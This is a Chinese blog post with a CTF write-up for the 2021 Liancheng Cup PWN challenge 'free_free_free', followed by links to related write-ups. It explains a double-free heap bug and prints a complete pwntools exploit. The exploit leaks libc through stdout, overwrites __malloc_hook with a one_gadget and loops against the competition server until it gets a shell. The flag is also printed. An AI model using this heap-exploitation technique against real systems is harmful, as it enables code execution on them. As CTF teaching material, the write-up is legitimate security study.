2021年“莲城杯”网络安全大赛-PWN-free_free_free

最新推荐文章于 2023-12-03 17:21:56 发布
最新推荐文章于 2023-12-03 17:21:56 发布
阅读量1.4k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 2021年“莲城杯”网络安全大赛 文章标签: 网络安全 python linux 2021年“莲城杯” PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43264813/article/details/120717300
这篇博客介绍了如何通过解决'free_free_free'挑战中的doublefree漏洞,利用Python实现内存操纵,最终获取远程靶机的shell。解题步骤包括理解保护机制、定位漏洞、构造payload并利用gadgets。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2021年“莲城杯”网络安全大赛-PWN-free_free_free

题目名称:free_free_free
题目内容:你一定很擅长free吧。靶机:nc 183.129.189.60 10023
题目分值:300.0
题目难度:中等
相关附件:free_free_free的附件.zip

解题思路:

1.保护机制,本地libc与远程一样,就没必要加载附件那个

在这里插入图片描述

2.漏洞点 - double free

在这里插入图片描述

3.要爆破stdout,1/16的可能,stdout-0x43有7f的size,malloc_hook-0x23有7f的size,fastbin 伪造size,reallo调节栈帧,exp中没写循环,多执行几次。

#!/usr/bin/env python from pwn import *

local = 0
debug = 0
binary = "./free_free_free"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
elf = ELF(binary)
context.log_level = "debug" if debug else "info"


if local:
	# p = process(binary) libc = ELF(lib)
else :
	# p = remote("183.129.189.60","10023")
	# lib = "./libc.so.6" 
	libc = ELF(lib)

s	= lambda buf	: p.send(buf)
sl	= lambda buf	: p.sendline(buf)
sa	= lambda delim, buf : p.sendafter(delim, buf)
sal	= lambda delim, buf : p.sendlineafter(delim, buf) 
sh	= lambda	: p.interactive()
r	= lambda n=None	: p.recv(n)
ru	= lambda delim	: p.recvuntil(delim)
r7f	= lambda	: u64(p.recvuntil("\x7f")[-6:]+"\x00\x00") 
trs	= lambda addr	: libc.address+addr
gadget = lambda ins	: libc.search(asm(ins,arch="amd64")).next() 
tohex	= lambda buf	: "".join("\\x%02x"%ord(_) for _ in buf)

def add(size,content): 
	sal("> ","1")
	sal("size> ",str(size)) 
	sa("message> ",content)
def free(id):
	sal("> ","2")
	sal("idx> ",str(id)) 
def pwn():
	add(0x78+1,"0"*8)
	add(0x60,"1"*8)
	add(0x60,"2"*8) 
	free(0) 
	add(0x18,"3"*8) 
	add(0x60,"\xdd\x65") 
	free(2)
	free(1) 
	free(2)
	add(0x60,chr(0x20)) 
	add(0x60,"tmp")
	add(0x60,"tmp") 
	# raw_input() 
	add(0x60,"tmp") 
	payload = ""
	payload += chr(0)*(0x33) 
	payload += p64(0xfbad3887) 	
	payload += p64(0)*3
	payload += "\x88"	#_chain filed 
	add(0x68,payload)

	libc.address = r7f()-libc.sym["_IO_2_1_stdin_"] 	
	info("libc basse => 0x%x"%libc.address)

	ogg = [trs(_) for _ in(0x45226,0x4527a,0xf03a4,0xf1247)] 
	og	= ogg[1]
	free(2) 
	free(1) 
	free(2)
	add(0x60,p64(libc.sym[" malloc_hook"]-0x23)) 		
	add(0x60,"tmp")
	add(0x60,"tmp") 
	payload = ""
	payload += chr(0)*(0x13-8) 
	payload += p64(og)
	payload += p64(libc.sym["realloc"]+16) 	
	add(0x68,payload)
	sl("1")
	sl("17")
while	True: 
	try:
		# p = process(binary)
		p = remote("183.129.189.60","10023")
		pwn() 
		break
	except:
		p.close() 
raw_input("[*] get shell") 
sh()
# DASCTF{7a95efe41004077a790d234f5b90c343}
2021莲城比赛题包.zip
10-12
2021莲城比赛题包.zip
2021莲城网络安全大赛-PWN-pwn10(三血)
qq_43264813的博客
10-12 952
2021莲城网络安全大赛-PWN-pwn10 题目名称:pwn10 题目内容:栈溢出。靶机:nc 183.129.189.60 10016 题目分值:100.0 题目难度:容易 相关附件:pwn10的附件.zip 解题思路: 1.保护机制,静态链接,没pie 2.主要函数 3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址找到偏移0x78,然后 rop syscall ```python #!/usr/bin/
2021莲城网络安全大赛-Web-Easy_go(一血)
qq_43264813的博客
10-12 2454
2021莲城网络安全大赛-Web-Easy_go(一血) 题目名称:Easy_go 题目内容:你听说过gob吗?靶机:183.129.189.60:10006 题目分值:100.0 题目难度:容易 解题思路: 1.根据提示,生成一个 gob 序列化文件: 2.上传该文件即可: ```go package main import ( "encoding/gob" "fmt" "os" ) type person struct { Name string } // if person.Na
2021莲城网络安全大赛-Reverse-baby_rust
qq_43264813的博客
10-12 1340
2021莲城网络安全大赛-Reverse-baby_rust 题目名称:baby_rust 题目内容:能不能再简单一点 题目分值:200.0 题目难度:中等 相关附件:baby_rust的附件 解题思路: 1.Rust的断言和Panic都会在其中保留原始代码和文件信息,借此可以找出实际被使用的第三方库: 2.注意到process是一个可逆的XOR过程,引用该库,从代码中提出Key和密文,直接调用即可 flag{790d329ef321144ec44f37d18919b418} ...
2021莲城网络安全大赛-Reverse-LongTime
qq_43264813的博客
10-12 938
2021莲城网络安全大赛-Reverse-LongTime 题目名称:LongTime 题目内容:If you have long time, Flag is yours. 题目分值:300.0 题目难度:困难 相关附件:LongTime的附件.zip 解题思路: 1.核心算法如下,直接进行计算的话计算量极大(v1会很大),需要简化算法。 2.将算法翻译为Python并确保得出相同结果,对其中的变量进行打印,发现具有一定的周期性(并且每一步仅与上一步结尾的两个变量有关,只要这两个变量一致,后续操作
2021“绿城网络安全大赛
09-30
2021“绿城网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
2021莲城网络安全比赛题库精粹
资源摘要信息: "2021莲城比赛题包.zip" ...综上所述,2021莲城比赛题包.zip文件是对网络安全竞技领域的一次实践演练,参赛者将通过解决各种网络安全问题来提升自己的技能,同时也为网络安全事业的发展做出贡献。
莲城的老李说 spring-secuirty
最新发布
01-06
具体来说,针对Web应用程序而言,应当加入`spring-boot-starter-security`这一核心组件作为起步依赖,它包含了所有必要的类库来快速搭建安全防护体系结构[^3]。 ```xml <groupId>org.springframework.boot ...
XXXX长沙标志莲城别墅项目营销提案_69p_销售推广方案.pptx
10-11
本提案的核心关注点在于如何通过精准的营销策略,将长沙标志莲城别墅项目打造成湘潭地区的标志性高端住宅。以下是一些关键知识点: 1. **营销策略**:项目初期应主打别墅产品,以建立品牌形象和高度。借鉴长沙海尔...
2021莲城web部分wp
Love&Share
10-11 7481
easy_go go反序列化,现学现卖,和python反序列化很像 html源码中有提示 poc-main.go package main import ( "encoding/gob" "fmt" "os" ) type person struct { Name string } func main(){ file, err := os.Create("./gob") if err != nil { fmt.Println(err)
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门和PWN的学习,是入门指导。
pwn 之use_after_free
Maxmalloc的博客
12-08 598
题目链接 先贴出源代码 add_note notelist[i] = malloc(8u); ... *(_DWORD *)notelist[i] = print_note_content; printf(&amp;quot;Note size :&amp;quot;); read(0, &amp;amp;amp;buf, 8u); size = atoi(&amp;amp;am...
CTF-PWN--【malloc和free的工作流程】
llovewuzhengzi的博客
12-03 1366
以下都是基于glibc-2.19版本,其他版本会有变动,但依然可提供参考。
2021莲城网络安全大赛-Web-Minesweepe
qq_43264813的博客
10-12 2327
2021莲城网络安全大赛-Web-Minesweepe 题目名称:Minesweepe 题目内容:扫个雷吧,三个难度都通关了即可获得flag哦.靶机:183.129.189.60:10005 题目分值:100.0 题目难度:容易 解题思路: 1.查看源代码 js代码打开 2.定位通关,查到关键flag字符 _0x4cf3('0x1','2$t7')+_0x4cf3('0x3','1vj%')+_0x4cf3('0x5','@2yf') 3.控制台运行输出flag DASCTF{c4a204599
莲城DASCTF[Minesweepe]
Hopeace的博客
10-14 1463
DASCTF[Minesweepe]0x01 分析题目0x02 修改js代码0x03 反思 题目名:Minesweepe 作者:Hopeace 靶场地址:183.129.189.60:10005 0x01 分析题目 游戏类的题目一般就是两种思路: 第一是玩儿游戏,当然难度比较大,第三关的扫雷确实难,做了两次运气不太好,没解出来 第二是修改js代码 0x02 修改js代码 利用chrome自带的开发者工具 进去发现,右键被禁用了(怪不得右键没法点检查) 找到了success的函数 里面有一串加密的代码 明显是
莲城2021 Crypto writes up
weixin_56678592的博客
10-12 362
莲城2021 Crypto writes up #1 randomCrypto 题目: from random import randint flag = 'flag{********************************}' b = [ ord(i) for i in flag ] a = randint(65, max(b)) encflag="" for i in range(len(flag)): encflag += str(bin((ord(flag[i])^a)<&l
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 6017
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
Pwn-Overflow Free Chunk(堆溢出)
CharlesGodX的博客
03-22 1335
0x00:前言 这次介绍一种和栈溢出类似名字的堆溢出攻击,首先借用应用CTF-Wiki上的例子理解一下堆溢出。 0x01:漏洞介绍 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块,我们用两...
2021莲城网络安全大赛-Crypto-Yusa的密码学课堂-MT19937(一血)
qq_43264813的博客
10-12 2916
2021莲城网络安全大赛-Crypto-Yusa的密码学课堂-MT19937(一血) 题目名称:Yusa的密码学课堂——MT19937 题目内容:这一节课,我们讲一讲伪随机数生成器。 题目分值:300.0 题目难度:中等 相关附件:Yusa的密码学课堂——MT19937的附件.zip 解题思路: 1.题目给了 mt19937_64 生成的前 1000 个随机数,但 pop 了第 374 个,要求出它。知道的随机数已达到 312 个,可以直接预测。参考 https://github.com/oToTo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值